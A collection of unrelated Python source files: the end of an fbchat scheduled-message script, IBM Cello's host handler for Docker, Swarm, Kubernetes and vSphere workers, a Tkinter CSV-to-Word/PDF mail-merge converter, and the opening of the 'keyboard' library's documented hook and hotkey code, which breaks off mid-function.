for thread, thread_type in zip(threads, thread_types):
if thread_type == "fake":
chat = thread
else:
chat = sess_types[False] if thread_type != "user" else sess_types[True]
chat = chat(session=sess, id=thread)
chats.append(chat)
return chats
if __name__ == "__main__":
if len(sys.argv) == 2:
if sys.argv[1] != "env":
print("Invalid argument. Session aborted")
sys.exit(1)
load_dotenv()
username = os.getenv("CLIENT", None)
password = os.getenv("PASSWORD", None)
threads = list(map(int, os.getenv("THREADS", None).split(",")))
thread_types = os.getenv("THREAD_TYPES", None).split(",")
try:
sess_cookies = cookies.load_cookies()
session = cookies.load_session(sess_cookies)
if not session:
session = fbchat.Session.login(username, password)
sess_types = (fbchat.Group, fbchat.User)
logger.info("Successfully logged in as {}".format(username))
client = fbchat.Client(session=session)
chats = create_fb_threads(session, sess_types, threads, thread_types)
logger.info(
"Created chats for %d, %d of type %s, %s", *threads, *thread_types
)
processes = [main_papa(c) for c in chats]
logger.info("Spawning processes to send messages for chats...")
while True:
curr_time = dt.now().time().strftime("%H:%M:%S")
if curr_time == os.getenv("PAPIEZOWA_TIME"):
[p.start() for p in processes]
logger.info(
"Successfuly spawned processes, start sending messages"
)
[p.join() for p in processes]
break
if not all([p.is_alive() for p in processes]):
logger.info("Successfuly send messages. Logging out")
cookies.save_cookies(session.get_cookies())
session.logout()
logger.info("Done!")
sys.exit(0)
except Exception as e:
logger.error("Error: %s", e)
sys.exit(1)
session.logout()
|
host.py
|
# Copyright IBM Corp, All Rights Reserved.
#
# SPDX-License-Identifier: Apache-2.0
#
import datetime
import logging
import os
import random
import sys
import time
from threading import Thread
from uuid import uuid4
from pymongo.collection import ReturnDocument
sys.path.append(os.path.join(os.path.dirname(__file__), '..', '..'))
from common import \
log_handler, \
FabricV1NetworkConfig, utils, \
LOG_LEVEL, CLUSTER_LOG_TYPES, CLUSTER_LOG_LEVEL, \
NETWORK_SIZE_FABRIC_V1, \
CLUSTER_PORT_START, CLUSTER_PORT_STEP, \
CONSENSUS_PLUGINS_FABRIC_V1, CONSENSUS_PLUGIN_SOLO, \
WORKER_TYPES, VCENTER, VCUSERNAME, VCPWD, \
VMNAME, VMMEMORY, VMCPU, VMNETMASK, VMGATEWAY, TEMPLATE, VMIP, \
VIRTUAL_MACHINE, VCIP, VCPORT, VMDNS, NETWORK, VMUUID,\
VC_DATACENTER, VC_DATASTORE, VC_CLUSTER, \
WORKER_TYPE_DOCKER, WORKER_TYPE_SWARM, WORKER_TYPE_VSPHERE, \
HOST_STATUS, HOST_STATUS_PENDING
from agent import DockerHost, VsphereHost, KubernetesHost
from modules import cluster
from modules.models import Host as HostModel
from modules.models import Cluster as ClusterModel
from modules.models import HostSchema
logger = logging.getLogger(__name__)
logger.setLevel(LOG_LEVEL)
logger.addHandler(log_handler)
def check_status(func):
def wrapper(self, *arg):
if not self.is_active(*arg):
logger.warning("Host inactive")
return False
else:
return func(self, *arg)
return wrapper
class HostHandler(object):
""" Main handler to operate the hosts.
A host can be a worker like Docker host, Swarm or Kubernetes
"""
def __init__(self):
self.host_agents = {
'docker': DockerHost("docker"),
'swarm': DockerHost("swarm"),
'kubernetes': KubernetesHost(),
'vsphere': VsphereHost()
}
def create(self, name, worker_api, host_type, capacity=1,
log_level=CLUSTER_LOG_LEVEL[0],
log_type=CLUSTER_LOG_TYPES[0], log_server="", autofill="false",
schedulable="false", params=None):
""" Create a new docker host node
A docker host is potentially a single node or a swarm.
Will full fill with clusters of given capacity.
:param name: name of the node
:param worker_api: worker_api of the host
:param host_type: docker host type docker or swarm
:param capacity: The number of clusters to hold
:param log_type: type of the log
:param log_level: level of the log
:param log_server: server addr of the syslog
:param autofill: Whether automatically fillup with chains
:param schedulable: Whether can schedule cluster request to it
:param serialization: whether to get serialized result or object
:param params: extra data for vSphere host type
:return: True or False
"""
logger.debug("Create host: name={}, worker_api={}, host_type={}, "
"capacity={}, log={}/{}, autofill={}, schedulable={}"
.format(name, worker_api, host_type, capacity, log_type,
log_server, autofill, schedulable))
if params is None and not worker_api.startswith("tcp://"):
# params is None when host_type is either docker or swarm.
worker_api = "tcp://" + worker_api
if HostModel.objects(worker_api=worker_api).count():
logger.warning("{} already existed in db".format(worker_api))
return {}
if "://" not in log_server:
log_server = "udp://" + log_server
if log_type == CLUSTER_LOG_TYPES[0]:
log_server = ""
if not host_type:
logger.warning("Host {} cannot be setup".format(name))
return {}
hid = uuid4().hex
host = HostModel(id=hid,
name=name,
worker_api=worker_api,
capacity=capacity,
type=host_type,
log_level=log_level,
log_type=log_type,
log_server=log_server,
autofill=autofill == "true",
schedulable=schedulable == "true"
)
if (host_type == WORKER_TYPE_DOCKER or
host_type == WORKER_TYPE_SWARM):
if not self.host_agents[host_type].create(worker_api):
logger.warning("Host {} cannot be setup".format(name))
return {}
if host_type == WORKER_TYPE_VSPHERE:
vc = params.get(VCENTER)
vm = params.get(VIRTUAL_MACHINE)
vc_ip = vc.get(VCIP)
vc_username = vc.get(VCUSERNAME)
vc_passwd = vc.get(VCPWD)
vc_port = vc.get(VCPORT)
h_update = {
VMNAME: vm.get(VMNAME),
VMMEMORY: vm.get(VMMEMORY),
VMCPU: vm.get(VMCPU),
VMIP: vm.get(VMIP),
VMNETMASK: vm.get(VMNETMASK),
VMDNS: vm.get(VMDNS),
VMGATEWAY: vm.get(VMGATEWAY),
TEMPLATE: vc.get(TEMPLATE),
VC_DATACENTER: vc.get(VC_DATACENTER),
VC_CLUSTER: vc.get(VC_CLUSTER),
VC_DATASTORE: vc.get(VC_DATASTORE),
NETWORK: vc.get(NETWORK),
VCUSERNAME: vc_username,
VCPWD: vc_passwd,
VCPORT: vc_port,
HOST_STATUS: HOST_STATUS_PENDING
}
logger.debug("update {}".format(h_update))
host.status = HOST_STATUS_PENDING
try:
if self.host_agents[host_type].create(vc_ip,
vc_username,
vc_passwd, vc_port,
params, hid):
logger.info("Creating vSphere host{}".format(name))
except Exception as e: # Catch failure while connecting to vc.
logger.error("Host {} cannot be setup".format(name))
logger.error("{}".format(e))
return {"msg": "{}".format(e)}
host.save()
if capacity > 0 and autofill == "true": # should autofill it
self.fillup(str(hid))
return self._schema(host)
def get_by_id(self, id):
""" Get a host
:param id: id of the doc
:return: serialized result or obj
"""
try:
ins = HostModel.objects.get(id=id)
except Exception:
logger.warning("No host found with id=" + id)
return None
return ins
def update(self, id, d):
""" Update a host's property
TODO: may check when changing host type
:param id: id of the host
:param d: dict to use as updated values
:return: serialized result or obj
"""
logger.debug("Get a host with id=" + id)
h_old = self.get_by_id(id)
if not h_old:
logger.warning("No host found with id=" + id)
return {}
if h_old.status == "pending":
return {}
if "worker_api" in d and not d["worker_api"].startswith("tcp://"):
d["worker_api"] = "tcp://" + d["worker_api"]
if "capacity" in d:
d["capacity"] = int(d["capacity"])
if d["capacity"] < ClusterModel.objects(host=h_old).count():
logger.warning("Cannot set cap smaller than running clusters")
return {}
if "log_server" in d and "://" not in d["log_server"]:
d["log_server"] = "udp://" + d["log_server"]
if "log_type" in d and d["log_type"] == CLUSTER_LOG_TYPES[0]:
d["log_server"] = ""
if "autofill" in d:
d["autofill"] = d["autofill"] == "true"
if "schedulable" in d:
d["schedulable"] = d["schedulable"] == "true"
self.db_set_by_id(id, **d)
h_new = self.get_by_id(id)
return self._schema(h_new)
def list(self, filter_data={}):
""" List hosts with given criteria
:param filter_data: Image with the filter properties
:return: iteration of serialized doc
"""
logger.info("filter data {}".format(filter_data))
hosts = HostModel.objects(__raw__=filter_data)
return self._schema(hosts, many=True)
def delete(self, id):
""" Delete a host instance
:param id: id of the host to delete
:return:
"""
logger.debug("Delete a host with id={0}".format(id))
try:
h = HostModel.objects.get(id=id)
except Exception:
logger.warning("Cannot delete non-existed host")
return False
host_type = h.type
if ClusterModel.objects(host=h).count():
logger.warning("Host type not found.")
return False
elif (host_type == WORKER_TYPE_DOCKER or
host_type == WORKER_TYPE_SWARM):
self.host_agents[host_type].delete(h.worker_api)
elif host_type == WORKER_TYPE_VSPHERE:
if h.status == "pending":
return False
vmuuid = h.vcparam[utils.VMUUID]
vcip = h.vcparam[utils.VCIP]
vcusername = h.vcparam[utils.VCUSERNAME]
vcpwd = h.vcparam[utils.VCPWD]
vcport = h.vcparam[utils.VCPORT]
self.host_agents[host_type].delete(vmuuid,
vcip,
vcusername,
vcpwd,
vcport)
h.delete()
return True
@check_status
def fillup(self, id):
"""
Fullfil a host with clusters to its capacity limit
:param id: host id
:return: True or False
"""
logger.debug("Try fillup host {}".format(id))
host = self.get_by_id(id)
if not host:
return False
if host.status != "active":
logger.warning("host {} is not active".format(id))
return False
clusters = ClusterModel.objects(host=host)
num_new = host.capacity - len(clusters)
if num_new <= 0:
logger.warning("host {} already full".format(id))
return True
free_ports = cluster.cluster_handler.find_free_start_ports(id, num_new)
logger.debug("Free_ports = {}".format(free_ports))
def create_cluster_work(start_port):
cluster_name = "{}_{}".format(
host.name,
int((start_port - CLUSTER_PORT_START) / CLUSTER_PORT_STEP))
cluster_size = random.choice(NETWORK_SIZE_FABRIC_V1)
config = FabricV1NetworkConfig(
consensus_plugin=CONSENSUS_PLUGIN_SOLO,
size=cluster_size)
cid = cluster.cluster_handler.create(name=cluster_name,
host_id=id, config=config,
start_port=start_port)
if cid:
logger.debug("Create cluster {} with id={}".format(
cluster_name, cid))
else:
logger.warning("Create cluster failed")
for p in free_ports:
t = Thread(target=create_cluster_work, args=(p,))
t.start()
time.sleep(0.2)
return True
@check_status
def clean(self, id):
"""
Clean a host's free clusters.
:param id: host id
:return: True or False
"""
logger.debug("clean host with id = {}".format(id))
host = self.get_by_id(id)
if not host:
return False
clusters = ClusterModel.objects(host=host)
if host.status != "active":
return False
if len(clusters) <= 0:
return True
host = self.db_set_by_id(id, **{"autofill": False})
schedulable_status = host.schedulable
if schedulable_status:
host = self.db_set_by_id(id, **{"schedulable": False})
for cluster_item in clusters:
cid = str(cluster_item.id)
t = Thread(target=cluster.cluster_handler.delete, args=(cid,))
t.start()
time.sleep(0.2)
if schedulable_status:
self.db_set_by_id(id, **{"schedulable": schedulable_status})
return True
def reset(self, id):
"""
Clean a host's free clusters.
:param id: host id
:return: True or False
"""
logger.debug("clean host with id = {}".format(id))
host = self.get_by_id(id)
if not host or ClusterModel.objects(host=host).count() < 0:
logger.warning("No find resettable host with id ={}".format(id))
return False
host_type = host.type
return self.host_agents[host_type].reset(host_type, host.worker_api)
def refresh_status(self, id):
"""
Refresh the status of the host by detection
:param host: the host to update status
:return: Updated host
"""
host = self.get_by_id(id)
if not host:
logger.warning("No host found with id=" + id)
return False
if not self.host_agents[host.type]\
.refresh_status(host.worker_api):
logger.warning("Host {} is inactive".format(id))
self.db_set_by_id(id, **{"status": "inactive"})
return False
else:
self.db_set_by_id(id, **{"status": "active"})
return True
def is_active(self, host_id):
"""
Update status of the host
:param host_id: the id of the host to update status
:return: Updated host
"""
host = self.get_by_id(host_id)
if not host:
logger.warning("invalid host is given")
return False
return host.status == "active"
def get_active_host_by_id(self, id):
"""
Check if id exists, and status is active. Otherwise update to inactive.
:param id: host id
:return: host or None
"""
logger.debug("check host with id = {}".format(id))
try:
host = HostModel.objects.get(id=id)
except Exception:
logger.warning("No active host found with id=" + id)
return None
return host
def _serialize(self, doc, keys=['id', 'name', 'worker_api', 'capacity',
'type', 'create_ts', 'status', 'autofill',
'schedulable', 'log_level',
'log_type', 'log_server']):
""" Serialize an obj
:param doc: doc to serialize
:param keys: filter which key in the results
:return: serialized obj
"""
result = {}
if doc:
for k in keys:
result[k] = doc.get(k, '')
return result
def _schema(self, doc, many=False):
host_schema = HostSchema(many=many)
return host_schema.dump(doc).data
def schema(self, doc, many=False):
return self._schema(doc, many)
def db_set_by_id(self, id, **kwargs):
"""
Set the key:value pairs to the data
:param id: Which host to update
:param kwargs: kv pairs
:return: The updated host json dict
"""
kwargs = dict(('set__' + k, v)
for (k, v) in locals().get("kwargs", {}).items())
HostModel.objects(id=id).update(
upsert=True,
**kwargs
)
return HostModel.objects.get(id=id)
host_handler = HostHandler()
|
convert.py
|
import csv
import os
import platform
import queue
import subprocess
import threading
from os import mkdir, unlink
from os.path import abspath, isdir, join, normpath
from tempfile import NamedTemporaryFile
from tkinter import *
from tkinter import messagebox, ttk
from base_window import BaseWindow
from docx2pdf import convert
from files import __location__
from mailmerge_tracking import MailMergeTracking
class Convert(BaseWindow):
def __init__(self, base, field_map, files, output_as_word, output_as_pdf, user_settings, limit=None):
super().__init__(user_settings = user_settings)
self.field_map = field_map
self.files = files
self.output_as_word = output_as_word
self.output_as_pdf = output_as_pdf
self.user_settings = user_settings
self.run_popup = Toplevel(takefocus=True)
self.run_popup.focus_force()
#self.run_popup.grab_set()
self.run_popup.protocol("WM_DELETE_WINDOW", self.on_closing)
self.run_popup.wm_title("Converting...")
self.run_popup.resizable(0, 0)
self.run_popup.columnconfigure(0,weight=1)
self.run_popup.configure(bg=self.window_bg)
self.running_description = StringVar(value="Mapping data to fields...")
self.running_description_label = Label(self.run_popup, bg=self.window_bg, fg=self.fg, textvariable=self.running_description, justify=LEFT)
self.running_description_label.grid(row=1, column=0, pady=(10,0), padx=5, sticky=W)
s = ttk.Style()
s.theme_use('alt')
s.configure('blue.Horizontal.TProgressbar', troughcolor = 'gray35', troughrelief = 'flat', background = '#2f92ff')
self.progress = ttk.Progressbar(self.run_popup, style = 'blue.Horizontal.TProgressbar', orient="horizontal",length=250, mode="determinate")
self.progress_indeterminate = ttk.Progressbar(self.run_popup, style = 'blue.Horizontal.TProgressbar', orient="horizontal",length=250, mode="indeterminate")
if limit is None:
with open(self.files.csv_file, encoding='utf8', newline='') as csv_file:
self.num_records = sum(1 for row in csv.reader(csv_file)) - 1
else:
self.num_records = limit
self.progress["maximum"] = self.num_records
self.progress_indeterminate["maximum"] = 100
self.running_count = StringVar(value="0 of "+str(self.num_records))
self.running_count_label = Label(self.run_popup, bg=self.window_bg, fg=self.fg, textvariable=self.running_count, justify=LEFT)
self.running_count_label.grid(row=1, column=1, pady=(10,0), padx=5, sticky=E)
self.progress.grid(row=2, column=0, columnspan=2, pady=(0,20), padx=5, sticky='ew')
self.run_popup.update_idletasks()
x = base.winfo_rootx()
y = base.winfo_rooty()
x_offset = base.winfo_width() / 2 - self.run_popup.winfo_width() / 2
y_offset = base.winfo_height() / 4 - self.run_popup.winfo_height() / 2
geom = "+%d+%d" % (x+x_offset,y+y_offset)
self.run_popup.wm_geometry(geom)
self.queue = queue.Queue()
self.cancel_convert = threading.Event()
self.thread = threading.Thread(target=self.write_out, args=(self.cancel_convert,limit))
self.thread.start()
self.run_popup.after(1, self.refresh_data)
def refresh_data(self):
"""
"""
# do nothing if the aysyncio thread is dead
# and no more data in the queue
if not self.thread.is_alive() and self.queue.empty():
self.run_popup.destroy()
return
# refresh the GUI with new data from the queue
while not self.queue.empty():
progress, description, mode = self.queue.get()
if mode == "determinate":
self.progress['value'] = progress
self.running_description.set(description)
self.running_count.set(str(progress)+" of "+str(self.num_records))
elif mode == "indeterminate":
self.progress.destroy()
self.running_count_label.destroy()
self.progress_indeterminate.grid(row=2, column=0, columnspan=2, pady=(0,20), padx=5, sticky='ew')
self.progress_indeterminate.start(20)
self.running_description.set(description)
elif mode == "holding":
pass
elif mode == "finished":
self.progress_indeterminate.stop()
self.run_popup.update()
# timer to refresh the gui with data from the asyncio thread
self.run_popup.after(1, self.refresh_data)
def write_out(self, stopped, limit):
document = MailMergeTracking(self.files.template)
merge_data = self.prepair_data(document, stopped, limit)
if not stopped.is_set():
self.queue.put((self.num_records, "Mapping data to fields...", "determinate"))
else: return
self.queue.put((0, "Merging into template...", "determinate"))
document.merge_templates(merge_data, separator="page_break", queue=self.queue, stopped=stopped)
self.queue.put((self.num_records, "Merging into template...", "determinate"))
self.queue.put((None, "Saving...", "indeterminate"))
if not stopped.is_set():
docx_filepath, pdf_filepath = self.prepair_filenames()
else: return
if not stopped.is_set():
self.write_to_files(document, docx_filepath, pdf_filepath)
else: return
self.queue.put((None, "Opening...", "holding"))
if not stopped.is_set():
self.open_on_finish(docx_filepath, pdf_filepath)
else: return
self.queue.put((None, "Opening...", "finished"))
def prepair_data(self, document, stopped, limit):
with open(self.files.csv_file, encoding='utf8', newline='') as csv_file:
csv_dict = csv.DictReader(csv_file)
merge_data = []
progress = 0
for row in csv_dict:
if limit is not None:
if progress == limit:
break
if not stopped.is_set():
merge_data.append({field:row[self.field_map[field]] for field in document.get_merge_fields()})
progress += 1
self.queue.put((progress, "Mapping data to fields...", "determinate"))
else: return
return merge_data
def prepair_filenames(self):
docx_filename = str(self.files.filename)+".docx"
pdf_filename = str(self.files.filename)+".pdf"
if not isdir(self.files.folder):
mkdir(self.files.folder)
docx_filepath = normpath(abspath(join(self.files.folder, docx_filename)))
pdf_filepath = normpath(abspath(join(self.files.folder, pdf_filename)))
return (docx_filepath, pdf_filepath)
def write_to_files(self, document, docx_filepath, pdf_filepath):
if not self.output_as_word:
temp_docx = NamedTemporaryFile(delete=False, suffix=".docx")
temp_docx.close()
document.write(temp_docx.name)
document.close()
try:
convert(temp_docx.name, pdf_filepath)
except NotImplementedError:
pass
unlink(temp_docx.name)
if not self.output_as_pdf:
document.write(docx_filepath)
document.close()
if self.output_as_word and self.output_as_pdf:
document.write(docx_filepath)
document.close()
try:
convert(docx_filepath, pdf_filepath)
except NotImplementedError:
pass
def open_on_finish(self, docx_filepath, pdf_filepath):
if platform.system() == 'Darwin': # macOS
if self.output_as_word:
subprocess.call(('open', docx_filepath))
if self.output_as_pdf:
subprocess.call(('open', pdf_filepath))
elif platform.system() == 'Windows': # Windows
if self.output_as_word:
os.startfile(docx_filepath)
if self.output_as_pdf:
os.startfile(pdf_filepath)
else: # linux variants
if self.output_as_word:
subprocess.call(('xdg-open', docx_filepath))
def on_closing(self):
if messagebox.askyesno("CSV 2 Paper", "Are you sure you want to cancel?"):
self.cancel_convert.set()
if self.thread.is_alive():
self.thread.join()
self.run_popup.destroy()
|
__init__.py
|
# -*- coding: utf-8 -*-
"""
keyboard
========
Take full control of your keyboard with this small Python library. Hook global events, register hotkeys, simulate key presses and much more.
## Features
- **Global event hook** on all keyboards (captures keys regardless of focus).
- **Listen** and **send** keyboard events.
- Works with **Windows** and **Linux** (requires sudo), with experimental **OS X** support (thanks @glitchassassin!).
- **Pure Python**, no C modules to be compiled.
- **Zero dependencies**. Trivial to install and deploy, just copy the files.
- **Python 2 and 3**.
- Complex hotkey support (e.g. `ctrl+shift+m, ctrl+space`) with controllable timeout.
- Includes **high level API** (e.g. [record](#keyboard.record) and [play](#keyboard.play), [add_abbreviation](#keyboard.add_abbreviation)).
- Maps keys as they actually are in your layout, with **full internationalization support** (e.g. `Ctrl+ç`).
- Events automatically captured in separate thread, doesn't block main program.
- Tested and documented.
- Doesn't break accented dead keys (I'm looking at you, pyHook).
- Mouse support available via project [mouse](https://github.com/boppreh/mouse) (`pip install mouse`).
## Usage
Install the [PyPI package](https://pypi.python.org/pypi/keyboard/):
pip install keyboard
or clone the repository (no installation required, source files are sufficient):
git clone https://github.com/boppreh/keyboard
or [download and extract the zip](https://github.com/boppreh/keyboard/archive/master.zip) into your project folder.
Then check the [API docs below](https://github.com/boppreh/keyboard#api) to see what features are available.
## Example
```py
import keyboard
keyboard.press_and_release('shift+s, space')
keyboard.write('The quick brown fox jumps over the lazy dog.')
keyboard.add_hotkey('ctrl+shift+a', print, args=('triggered', 'hotkey'))
# Press PAGE UP then PAGE DOWN to type "foobar".
keyboard.add_hotkey('page up, page down', lambda: keyboard.write('foobar'))
# Blocks until you press esc.
keyboard.wait('esc')
# Record events until 'esc' is pressed.
recorded = keyboard.record(until='esc')
# Then replay back at three times the speed.
keyboard.play(recorded, speed_factor=3)
# Type @@ then press space to replace with abbreviation.
keyboard.add_abbreviation('@@', 'my.long.email@example.com')
# Block forever, like `while True`.
keyboard.wait()
```
## Known limitations:
- Events generated under Windows don't report device id (`event.device == None`). [#21](https://github.com/boppreh/keyboard/issues/21)
- Media keys on Linux may appear nameless (scan-code only) or not at all. [#20](https://github.com/boppreh/keyboard/issues/20)
- Key suppression/blocking only available on Windows. [#22](https://github.com/boppreh/keyboard/issues/22)
- To avoid depending on X, the Linux parts reads raw device files (`/dev/input/input*`)
but this requries root.
- Other applications, such as some games, may register hooks that swallow all
key events. In this case `keyboard` will be unable to report events.
- This program makes no attempt to hide itself, so don't use it for keyloggers or online gaming bots. Be responsible.
"""
from __future__ import print_function as _print_function
import re as _re
import itertools as _itertools
import collections as _collections
from threading import Thread as _Thread, Lock as _Lock
import time as _time
# Python2... Buggy on time changes and leap seconds, but no other good option (https://stackoverflow.com/questions/1205722/how-do-i-get-monotonic-time-durations-in-python).
_time.monotonic = getattr(_time, 'monotonic', None) or _time.time
try:
# Python2
long, basestring
_is_str = lambda x: isinstance(x, basestring)
_is_number = lambda x: isinstance(x, (int, long))
import Queue as _queue
# threading.Event is a function in Python2 wrappin _Event (?!).
from threading import _Event as _UninterruptibleEvent
except NameError:
# Python3
_is_str = lambda x: isinstance(x, str)
_is_number = lambda x: isinstance(x, int)
import queue as _queue
from threading import Event as _UninterruptibleEvent
_is_list = lambda x: isinstance(x, (list, tuple))
# Just a dynamic object to store attributes for the closures.
class _State(object): pass
# The "Event" class from `threading` ignores signals when waiting and is
# impossible to interrupt with Ctrl+C. So we rewrite `wait` to wait in small,
# interruptible intervals.
class _Event(_UninterruptibleEvent):
def wait(self):
while True:
if _UninterruptibleEvent.wait(self, 0.5):
break
import platform as _platform
if _platform.system() == 'Windows':
from. import _winkeyboard as _os_keyboard
elif _platform.system() == 'Linux':
from. import _nixkeyboard as _os_keyboard
elif _platform.system() == 'Darwin':
from. import _darwinkeyboard as _os_keyboard
else:
raise OSError("Unsupported platform '{}'".format(_platform.system()))
from ._keyboard_event import KEY_DOWN, KEY_UP, KeyboardEvent, normalize_name as _normalize_name
from ._generic import GenericListener as _GenericListener
from ._canonical_names import all_modifiers, sided_modifiers
_modifier_scan_codes = set()
def is_modifier(key):
"""
Returns True if `key` is a scan code or name of a modifier key.
"""
if _is_str(key):
return key in all_modifiers
else:
if not _modifier_scan_codes:
scan_codes = (key_to_scan_codes(name, False) for name in all_modifiers)
_modifier_scan_codes.update(*scan_codes)
return key in _modifier_scan_codes
_pressed_events_lock = _Lock()
_pressed_events = {}
_physically_pressed_keys = _pressed_events
_logically_pressed_keys = {}
class _KeyboardListener(_GenericListener):
transition_table = {
#Current state of the modifier, per `modifier_states`.
#|
#| Type of event that triggered this modifier update.
#| |
#| | Type of key that triggered this modiier update.
#| | |
#| | | Should we send a fake key press?
#| | | |
#| | | => | Accept the event?
#| | | | |
#| | | | | Next state.
#v v v v v v
('free', KEY_UP, 'modifier'): (False, True, 'free'),
('free', KEY_DOWN, 'modifier'): (False, False, 'pending'),
('pending', KEY_UP, 'modifier'): (True, True, 'free'),
('pending', KEY_DOWN, 'modifier'): (False, True, 'allowed'),
('suppressed', KEY_UP, 'modifier'): (False, False, 'free'),
('suppressed', KEY_DOWN, 'modifier'): (False, False, 'suppressed'),
('allowed', KEY_UP, 'modifier'): (False, True, 'free'),
('allowed', KEY_DOWN, 'modifier'): (False, True, 'allowed'),
('free', KEY_UP, 'hotkey'): (False, None, 'free'),
('free', KEY_DOWN, 'hotkey'): (False, None, 'free'),
('pending', KEY_UP, 'hotkey'): (False, None, 'suppressed'),
('pending', KEY_DOWN, 'hotkey'): (False, None, 'suppressed'),
('suppressed', KEY_UP, 'hotkey'): (False, None, 'suppressed'),
('suppressed', KEY_DOWN, 'hotkey'): (False, None, 'suppressed'),
('allowed', KEY_UP, 'hotkey'): (False, None, 'allowed'),
('allowed', KEY_DOWN, 'hotkey'): (False, None, 'allowed'),
('free', KEY_UP, 'other'): (False, True, 'free'),
('free', KEY_DOWN, 'other'): (False, True, 'free'),
('pending', KEY_UP, 'other'): (True, True, 'allowed'),
('pending', KEY_DOWN, 'other'): (True, True, 'allowed'),
# Necessary when hotkeys are removed after beign triggered, such as
# TestKeyboard.test_add_hotkey_multistep_suppress_modifier.
('suppressed', KEY_UP, 'other'): (False, False, 'allowed'),
('suppressed', KEY_DOWN, 'other'): (True, True, 'allowed'),
('allowed', KEY_UP, 'other'): (False, True, 'allowed'),
('allowed', KEY_DOWN, 'other'): (False, True, 'allowed'),
}
def init(self):
_os_keyboard.init()
self.active_modifiers = set()
self.blocking_hooks = []
self.blocking_keys = _collections.defaultdict(list)
self.nonblocking_keys = _collections.defaultdict(list)
self.blocking_hotkeys = _collections.defaultdict(list)
self.nonblocking_hotkeys = _collections.defaultdict(list)
self.filtered_modifiers = _collections.Counter()
self.is_replaying = False
# Supporting hotkey suppression is harder than it looks. See
# https://github.com/boppreh/keyboard/issues/22
self.modifier_states = {} # "alt" -> "allowed"
def pre_process_event(self, event):
for key_hook in self.nonblocking_keys[event.scan_code]:
key_hook(event)
with _pressed_events_lock:
hotkey = tuple(sorted(_pressed_events))
for callback in self.nonblocking_hotkeys[hotkey]:
callback(event)
return event.scan_code or (event.name and event.name != 'unknown')
def direct_callback(self, event):
"""
This function is called for every OS keyboard event and decides if the
event should be blocked or not, and passes a copy of the event to
other, non-blocking, listeners.
There are two ways to block events: remapped keys, which translate
events by suppressing and re-emitting; and blocked hotkeys, which
suppress specific hotkeys.
"""
# Pass through all fake key events, don't even report to other handlers.
if self.is_replaying:
return True
if not all(hook(event) for hook in self.blocking_hooks):
return False
event_type = event.event_type
scan_code = event.scan_code
# Update tables of currently pressed keys and modifiers.
with _pressed_events_lock:
if event_type == KEY_DOWN:
if is_modifier(scan_code): self.active_modifiers.add(scan_code)
_pressed_events[scan_code] = event
hotkey = tuple(sorted(_pressed_events))
if event_type == KEY_UP:
self.active_modifiers.discard(scan_code)
if scan_code in _pressed_events: del _pressed_events[scan_code]
# Mappings based on individual keys instead of hotkeys.
for key_hook in self.blocking_keys[scan_code]:
if not key_hook(event):
return False
# Default accept.
accept = True
if self.blocking_hotkeys:
if self.filtered_modifiers[scan_code]:
origin = 'modifier'
modifiers_to_update = set([scan_code])
else:
modifiers_to_update = self.active_modifiers
if is_modifier(scan_code):
modifiers_to_update = modifiers_to_update | {scan_code}
callback_results = [callback(event) for callback in self.blocking_hotkeys[hotkey]]
if callback_results:
accept = all(callback_results)
origin = 'hotkey'
else:
origin = 'other'
for key in sorted(modifiers_to_update):
transition_tuple = (self.modifier_states.get(key, 'free'), event_type, origin)
should_press, new_accept, new_state = self.transition_table[transition_tuple]
if should_press: press(key)
if new_accept is not None: accept = new_accept
self.modifier_states[key] = new_state
if accept:
if event_type == KEY_DOWN:
_logically_pressed_keys[scan_code] = event
elif event_type == KEY_UP and scan_code in _logically_pressed_keys:
del _logically_pressed_keys[scan_code]
# Queue for handlers that won't block the event.
self.queue.put(event)
return accept
def listen(self):
_os_keyboard.listen(self.direct_callback)
_listener = _KeyboardListener()
def key_to_scan_codes(key, error_if_missing=True):
"""
Returns a list of scan codes associated with this key (name or scan code).
"""
if _is_number(key):
return (key,)
elif _is_list(key):
return sum((key_to_scan_codes(i) for i in key), ())
elif not _is_str(key):
raise ValueError('Unexpected key type ' + str(type(key)) + ', value (' + repr(key) + ')')
normalized = _normalize_name(key)
if normalized in sided_modifiers:
left_scan_codes = key_to_scan_codes('left ' + normalized, False)
right_scan_codes = key_to_scan_codes('right ' + normalized, False)
return left_scan_codes + tuple(c for c in right_scan_codes if c not in left_scan_codes)
try:
# Put items in ordered dict to remove duplicates.
t = tuple(_collections.OrderedDict((scan_code, True) for scan_code, modifier in _os_keyboard.map_name(normalized)))
e = None
except (KeyError, ValueError) as exception:
t = ()
e = exception
if not t and error_if_missing:
raise ValueError('Key {} is not mapped to any known key.'.format(repr(key)), e)
else:
return t
def parse_hotkey(hotkey):
"""
Parses a user-provided hotkey into nested tuples representing the
parsed structure, with the bottom values being lists of scan codes.
Also accepts raw scan codes, which are then wrapped in the required
number of nestings.
Example:
parse_hotkey("alt+shift+a, alt+b, c")
# Keys: ^~^ ^~~~^ ^ ^~^ ^ ^
# Steps: ^~~~~~~~~~^ ^~~~^ ^
# ((alt_codes, shift_codes, a_codes), (alt_codes, b_codes), (c_codes,))
"""
if _is_number(hotkey) or len(hotkey) == 1:
scan_codes = key_to_scan_codes(hotkey)
step = (scan_codes,)
steps = (step,)
return steps
elif _is_list(hotkey):
if not any(map(_is_list, hotkey)):
step = tuple(key_to_scan_codes(k) for k in hotkey)
steps = (step,)
return steps
return hotkey
steps = []
for step in _re.split(r',\s?', hotkey):
keys = _re.split(r'\s?\+\s?', step)
steps.append(tuple(key_to_scan_codes(key) for key in keys))
return tuple(steps)
def send(hotkey, do_press=True, do_release=True):
"""
Sends OS events that perform the given *hotkey* hotkey.
- `hotkey` can be either a scan code (e.g. 57 for space), single key
(e.g. 'space') or multi-key, multi-step hotkey (e.g. 'alt+F4, enter').
- `do_press` if true then press events are sent. Defaults to True.
- `do_release` if true then release events are sent. Defaults to True.
send(57)
send('ctrl+alt+del')
send('alt+F4, enter')
send('shift+s')
Note: keys are released in the opposite order they were pressed.
"""
_listener.is_replaying = True
parsed = parse_hotkey(hotkey)
for step in parsed:
if do_press:
for scan_codes in step:
_os_keyboard.press(scan_codes[0])
if do_release:
for scan_codes in reversed(step):
_os_keyboard.release(scan_codes[0])
_listener.is_replaying = False
# Alias.
press_and_release = send
def press(hotkey):
""" Presses and holds down a hotkey (see `send`). """
send(hotkey, True, False)
def release(hotkey):
""" Releases a hotkey (see `send`). """
send(hotkey, False, True)
def is_pressed(hotkey):
"""
Returns True if the key is pressed.
is_pressed(57) #-> True
is_pressed('space') #-> True
is_pressed('ctrl+space') #-> True
"""
_listener.start_if_necessary()
if _is_number(hotkey):
# Shortcut.
with _pressed_events_lock:
return hotkey in _pressed_events
